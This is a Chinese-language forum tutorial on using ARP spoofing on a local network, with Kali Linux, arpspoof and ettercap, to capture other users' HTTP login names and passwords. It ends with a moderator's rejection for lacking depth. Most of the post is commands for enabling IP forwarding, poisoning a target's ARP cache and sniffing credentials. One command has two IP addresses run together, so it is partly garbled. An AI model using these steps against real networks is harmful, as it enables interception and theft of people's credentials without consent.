【原创】内网ARP欺骗获取别人网站登录之HTTP账号和密码 温馨提示:声明不能接触法律 一、需要安装一个虚拟机。 二、Kali linux系统。 三、找到内网的目标机器:ipconfig/all (查看本机的ip) 例如:192.168.1.100 网关:192.168.1.1 首先开始了解以下的命令: 我们用到的命令有: 1. -i网卡 -t 目标空格网关 2. 查看ip命令: ifconfig 3. 欺骗命令: arpspoof 4. 查看内容: Cat 5. 欺骗-DNS欺骗-流量嗅探(查看获取信息) 命令:ettercap 6. -Tq启动,文本模式,9安静模式 第一步“开启ip转发” 命令:echo 1 > /proc/sys/net/ipv4/ip_forward (回车没有任何的返回) 第二步“查看内容” cat /proc/sys/net/ipv4/ip_forward (回车返回”1“证明成功了) 第三步“开始欺骗” arpspoof -i eth0 -t 192.168.1.100192.168.1.108 (回车之后不断欺骗运行中~~~[记得这个窗口需要保留) 第四步:【这个是在自己的电脑上操作的】 Win键+ R出来运行请输入CMD 回车然后输入 arp –a 看到自己的本地ip和目标ip后面两个是“动态”就正常的可以获取到账号和密码 第五步”查看获取信息“ (需要在另一个窗口输入的) ettercap -Tq -i eth0 (回车后就等待目标ip电脑操作就可以看到获取信息) 最后一步就可以看到我演示登录的网站和账号、密码。 有一些网站在大箭头的位置获取不了的,就要看下面小箭头这里有的需要解密有的不需要。 一般需要的解密的就是MD5模式的.
========================================== 深度以及拓展性不够,暂时不予通过。
|